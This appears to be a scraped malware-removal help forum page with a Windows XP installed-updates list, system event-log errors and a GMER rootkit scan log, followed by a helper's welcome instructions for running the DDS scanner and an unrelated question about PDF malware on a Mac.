Security Update for Windows XP (KB961371)
Security Update for Windows XP (KB961373)
Security Update for Windows XP (KB961501)
Security Update for Windows XP (KB968537)
Security Update for Windows XP (KB969059)
Security Update for Windows XP (KB969898)
Security Update for Windows XP (KB969947)
Security Update for Windows XP (KB970238)
Security Update for Windows XP (KB970430)
Security Update for Windows XP (KB971468)
Security Update for Windows XP (KB971486)
Security Update for Windows XP (KB971557)
Security Update for Windows XP (KB971633)
Security Update for Windows XP (KB971657)
Security Update for Windows XP (KB972270)
Security Update for Windows XP (KB973346)
Security Update for Windows XP (KB973354)
Security Update for Windows XP (KB973507)
Security Update for Windows XP (KB973525)
Security Update for Windows XP (KB973869)
Security Update for Windows XP (KB973904)
Security Update for Windows XP (KB974112)
Security Update for Windows XP (KB974318)
Security Update for Windows XP (KB974392)
Security Update for Windows XP (KB974571)
Security Update for Windows XP (KB975025)
Security Update for Windows XP (KB975467)
Security Update for Windows XP (KB975560)
Security Update for Windows XP (KB975561)
Security Update for Windows XP (KB975562)
Security Update for Windows XP (KB975713)
Security Update for Windows XP (KB977165)
Security Update for Windows XP (KB977816)
Security Update for Windows XP (KB977914)
Security Update for Windows XP (KB978037)
Security Update for Windows XP (KB978251)
Security Update for Windows XP (KB978262)
Security Update for Windows XP (KB978338)
Security Update for Windows XP (KB978542)
Security Update for Windows XP (KB978601)
Security Update for Windows XP (KB979309)
Security Update for Windows XP (KB979482)
Security Update for Windows XP (KB979559)
Security Update for Windows XP (KB979683)
Security Update for Windows XP (KB979687)
Security Update for Windows XP (KB980195)
Security Update for Windows XP (KB980218)
Security Update for Windows XP (KB980232)
Security Update for Windows XP (KB980436)
Security Update for Windows XP (KB981322)
Security Update for Windows XP (KB981852)
Security Update for Windows XP (KB981957)
Security Update for Windows XP (KB981997)
Security Update for Windows XP (KB982132)
Security Update for Windows XP (KB982214)
Security Update for Windows XP (KB982665)
Security Update for Windows XP (KB982802)
SkinsHP1
Sonic Express Labeler
Sonic RecordNow Audio
Sonic RecordNow Copy
Sonic RecordNow Data
Sonic Update Manager
System Requirements Lab
TrayApp
Unload
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217)
Update for Windows Internet Explorer 8 (KB2598845)
Update for Windows Internet Explorer 8 (KB2632503)
Update for Windows Internet Explorer 8 (KB971930)
Update for Windows Internet Explorer 8 (KB976662)
Update for Windows Internet Explorer 8 (KB976749)
Update for Windows XP (KB2141007)
Update for Windows XP (KB2345886)
Update for Windows XP (KB2467659)
Update for Windows XP (KB2492386)
Update for Windows XP (KB2541763)
Update for Windows XP (KB2607712)
Update for Windows XP (KB2616676)
Update for Windows XP (KB2641690)
Update for Windows XP (KB2661254-v2)
Update for Windows XP (KB2718704)
Update for Windows XP (KB2736233)
Update for Windows XP (KB2749655)
Update for Windows XP (KB2863058)
Update for Windows XP (KB2904266)
Update for Windows XP (KB2934207)
Update for Windows XP (KB951072-v2)
Update for Windows XP (KB951978)
Update for Windows XP (KB955759)
Update for Windows XP (KB955839)
Update for Windows XP (KB967715)
Update for Windows XP (KB968389)
Update for Windows XP (KB971029)
Update for Windows XP (KB971737)
Update for Windows XP (KB973687)
Update for Windows XP (KB973815)
Updates from HP
Visual Studio 2012 x86 Redistributables
WebFldrs XP
WebReg
Windows Genuine Advantage Notifications (KB905474)
Windows Genuine Advantage Validation Tool (KB892130)
Windows Internet Explorer 7
Windows Internet Explorer 8
Windows Media Format 11 runtime
Windows Media Player 11
Windows Resource Kit Tools
Windows XP Service Pack 3
Yahoo! Detect
.
==== Event Viewer Messages From Past Week ========
.
5/8/2014 9:52:25 PM, error: sr [1] - The System Restore filter encountered the unexpected error '0xC0000001' while processing the file '' on the volume 'HarddiskVolume2'. It has stopped monitoring the volume.
5/5/2014 4:32:24 PM, error: atapi [9] - The device, \Device\Ide\IdePort0, did not respond within the timeout period.
5/11/2014 2:33:32 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service MDM with arguments "" in order to run the server: {0C0A3666-30C9-11D0-8F20-00805F2CD064}
5/11/2014 2:21:40 AM, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: AFD Avgdiskx AVGIDSDriver AVGIDSShim Avgldx86 Avgtdix Fips intelppm IPSec MRxSmb NetBIOS NetBT RasAcd Rdbss Tcpip
5/11/2014 2:21:40 AM, error: Service Control Manager [7001] - The TCP/IP NetBIOS Helper service depends on the AFD service which failed to start because of the following error: A device attached to the system is not functioning.
5/11/2014 2:21:40 AM, error: Service Control Manager [7001] - The IPSEC Services service depends on the IPSEC driver service which failed to start because of the following error: A device attached to the system is not functioning.
5/11/2014 2:21:40 AM, error: Service Control Manager [7001] - The DNS Client service depends on the TCP/IP Protocol Driver service which failed to start because of the following error: A device attached to the system is not functioning.
5/11/2014 2:21:40 AM, error: Service Control Manager [7001] - The DHCP Client service depends on the NetBios over Tcpip service which failed to start because of the following error: A device attached to the system is not functioning.
5/11/2014 2:21:40 AM, error: Service Control Manager [7001] - The AVGIDSAgent service depends on the AVGIDSDriver service which failed to start because of the following error: A device attached to the system is not functioning.
5/11/2014 2:21:22 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service netman with arguments "" in order to run the server: {BA126AE5-2166-11D1-B1D0-00805FC1270E}
5/11/2014 2:21:21 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service EventSystem with arguments "" in order to run the server: {1BE1F766-5536-11D1-B726-00C04FB926AF}
5/11/2014 1:52:54 AM, error: Service Control Manager [7000] - The Pml Driver HPZ12 service failed to start due to the following error: The system cannot find the file specified.
5/11/2014 1:41:02 AM, error: Service Control Manager [7034] - The Wpm Service service terminated unexpectedly. It has done this 1 time(s).
5/11/2014 1:40:39 AM, error: Service Control Manager [7034] - The ConvertFilesforFreeUpdt service terminated unexpectedly. It has done this 1 time(s).
5/11/2014 1:40:35 AM, error: Service Control Manager [7034] - The System Update kb70007 service terminated unexpectedly. It has done this 1 time(s).
5/10/2014 10:54:51 PM, error: PSched [14103] - QoS [Adapter {4D5D6E9A-4506-4472-9313-1147BAFCBF9C}]: The netcard driver failed the query for OID_GEN_LINK_SPEED.
.
==== End Of File ===========================

GMER ark.txt log:

GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-05-11 22:17:28
Windows 5.1.2600 Service Pack 3 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3 ST3100011A rev.3.02 93.16GB
Running: wlhpf1op.exe; Driver: C:\DOCUME~1\HP_OWN~1.ELL\LOCALS~1\Temp\pwlcapow.sys


---- System - GMER 2.1 ----

SSDT \SystemRoot\system32\DRIVERS\avgidsshimx.sys ZwNotifyChangeKey [0xB99BC6E0]
SSDT \SystemRoot\system32\DRIVERS\avgidsshimx.sys ZwNotifyChangeMultipleKeys [0xB99BC800]
SSDT \SystemRoot\system32\DRIVERS\avgidsshimx.sys ZwOpenProcess [0xB99BC010]
SSDT \SystemRoot\system32\DRIVERS\avgidsshimx.sys ZwOpenThread [0xB99BC4D0]
SSDT \SystemRoot\system32\DRIVERS\avgidsshimx.sys ZwSuspendProcess [0xB99BC300]
SSDT \SystemRoot\system32\DRIVERS\avgidsshimx.sys ZwSuspendThread [0xB99BC3E0]
SSDT \SystemRoot\system32\DRIVERS\avgidsshimx.sys ZwTerminateProcess [0xB99BC120]
SSDT \SystemRoot\system32\DRIVERS\avgidsshimx.sys ZwTerminateThread [0xB99BC210]
SSDT \SystemRoot\system32\DRIVERS\avgidsshimx.sys ZwWriteVirtualMemory [0xB99BC5E0]

---- Kernel code sections - GMER 2.1 ----

? C:\DOCUME~1\HP_OWN~1.ELL\LOCALS~1\Temp\mbr.sys The filename, directory name, or volume label syntax is incorrect. !

---- Devices - GMER 2.1 ----

AttachedDevice \Driver\Tcpip \Device\Ip avgtdix.sys
AttachedDevice \Driver\Tcpip \Device\Tcp avgtdix.sys
AttachedDevice \Driver\Tcpip \Device\Udp avgtdix.sys
AttachedDevice \Driver\Tcpip \Device\RawIp avgtdix.sys
AttachedDevice \FileSystem\Fastfat \Fat fltmgr.sys

---- Registry - GMER 2.1 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch@Epoch 242686
Reg HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4D5D6E9A-4506-4472-9313-1147BAFCBF9C}@DhcpRetryTime 319

---- Disk sectors - GMER 2.1 ----

Disk \Device\Harddisk0\DR0 unknown MBR code

---- EOF - GMER 2.1 ----

Malware?

Hello donkey8kong, and welcome to the forum.

My name is nunped and I'll be helping you with any malware problems.

Please be aware that removing Malware is a potentially hazardous undertaking. I will take care not to knowingly suggest courses of action that might damage your computer. However, it is impossible for me to foresee all interactions that may happen between the software on your computer and those we'll use to clear you of infection, and I cannot guarantee the safety of your system. It is possible that we might encounter situations where the only recourse is to re-format and re-install your operating system, or that you will need to take your computer to a repair shop.

Because of this, I advise you to backup any personal files and folders before you start.

Here are some guidelines to help the cleaning process run as easily as possible.

  1. Please read this topic: Everyone MUST read this BEFORE posting for help in this forum where the conditions for receiving help here are explained.
  2. The instructions being given are for YOUR computer and system only! Using these instructions on a different computer can cause damage to that computer and possibly render it inoperable!
  3. You must have Administrator rights permissions for this computer.
  4. DO NOT run any other fix or removal tools unless instructed to do so!
  5. DO NOT install any other software (or hardware) during the cleaning process. This adds more items to be researched.
  6. Only post your problem at one help site. Applying fixes from multiple help sites can cause problems.
  7. Only reply to this thread. Do not start another thread.
  8. The absence of symptoms does not imply the absence of malware. Please continue responding until I give you the "All Clean".

Read through these instructions with your full attention.
Please ask first if you have any doubts.


To be sure whether you are infected, and to help you with the infection removal, we will need to ask you to run a number of scans.

First:
DDS Scan

  1. Please download DDS by sUBs. Save it to your desktop. (Alternate download link here)
    Disable any script blocking software you have running before running DDS.
  2. You must right click on the file above and select "Run As Administrator" to run the tool. A black window will open.
  3. When done, DDS will open two logs:
    • DDS.txt
    • Attach.txt

    Caution: The above logs will NOT be saved. Save them to your desktop.
    Please post both the DDS.txt and Attach.txt files in your next reply.

PDF Malware

Hi, I believe I have downloaded the same PDF malware as an earlier user mentioned - http://myonlinesecurity.co.uk/invoic...e-pdf-malware/

The difference for me is that I did it using a Mac running Lion. Is there any implication of this virus for Mac users? I have windows computers running on my network.

Would really appreciate any help!